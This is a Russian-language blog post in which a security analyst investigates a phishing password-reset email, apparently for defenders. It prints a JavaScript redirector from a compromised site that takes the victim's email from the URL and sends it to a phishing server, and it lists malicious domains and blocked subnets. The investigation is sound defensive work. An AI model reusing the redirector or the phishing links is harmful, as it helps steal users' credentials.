Всем привет! Хочу поделиться, возможно, не новым, но, на мой взгляд, довольно изощренным видом фишинга. Кто-то уже наверняка сталкивался с таким методом, а для кого-то он окажется в новинку.

ПРЕДУПРЕЖДЕНИЕ: Материалы данной статьи носят исключительно ознакомительный характер и публикуются в образовательных целях. Фишинг, равно как и любые разновидности социальной инженерии, направленные на получение НСД или нарушение целостности, доступности и конфиденциальности информации, являются уголовно наказуемыми деяниями. Информация предназначена для специалистов Blue Team в интересах противодействия интернет-мошенничеству.

Письмо

Открываю рабочую почту и вижу обратную связь от пользователя, в которой он предупреждает о попытке скама.

Обычная рядовая ситуация: юзера пытаются соскамить на письмо из техподдержки, но он сразу раскусил обман и перенаправил письмо в Отдел ИБ.

Вложение

Открываю сохраненное письмо. Вижу классическую попытку обмана, рассчитанную на невнимательность - сброс пароля от учетной записи. Письмо отправлено с домена "etrh.ru" (зарегистрирован в РУ-сегменте, но об этом далее).

Изучение ссылки

Проверяю ссылку с помощью curl, чтобы найти артефакты (стандартная процедура в таких ситуациях). И что же мы видим?

curl -s https://zil-dom.ru/bitrix/admin/rrc/cvvc.html

А видим мы ловкий трюк с использованием Java-скрипта, который автоматически редиректит нас на совершенно другой веб-ресурс.

https://threestarcrm.com/7yy/index.php?userid={victim_email}

Механизм атаки выглядит следующим образом: код на странице cvvc.html извлекает email жертвы из хэша URL и мгновенно (через 1 мс) перенаправляет браузер на основной фишинговый сервер:

var hash = window.location.hash;
var em = hash.split('#')[1];
window.setTimeout(function() {
    window.location.href = 'https://threestarcrm.com/7yy/index.php?userid=' + em;
}, 1);

ANY.RUN - REPORT

Прогоняю фишинговую ссылку через песочницу и получаю вполне очевидный результат - malicious activity

Индикаторы компрометации (IOC)

В таблице ниже — обнаруженные в ходе короткого расследования индикаторы. Считаю своим долгом предупредить коллег из Blue Team.

Принятые меры

1. На NGFW и антивирусе добавлены в черный список:

• FQDN-объект: threestarcrm.com — блокировка по доменному имени

• Subnet-объект: Fishing_69.49.232.0/22 — блокировка всей подсети хостинг-провайдера (69.49.232.0 – 69.49.235.255)

• FQDN-объект: zil-dom.ru — блокировка скомпрометированного редиректора

  2. Направлено обращение хостерам с приложением пруфов. Обратной связи пока не получил (что немного огорчает)

Резюме (коротко)

Вряд ли я открыл какую-то тайну. Домены "zil-dom.ru" и "etrh.ru", вероятно, скомпрометированы. Оба зарегистрированы на PRIVATE PERSON. Домен "treestarcrm.com" живет в Интернете около 7 лет, но блокировать его, по-видимому, никто не спешит. Методика фишинга достаточно хитрая, потому что все браузеры по умолчанию выполняют Java-срипты.

Основная опасность - это подмена содержания гиперссылки. При грамотной разведке цели мошенники могли бы вставить туда любой легитимный адрес компании и без труда обманули бы жертву, которая попыталась бы проверить ссылку, наведя на нее курсор (о чем обычно просят всех юзеров, перед тем, как кликнуть по ней). Такие вот дела.

Надеюсь, что статья была полезна. Всем добра! :-)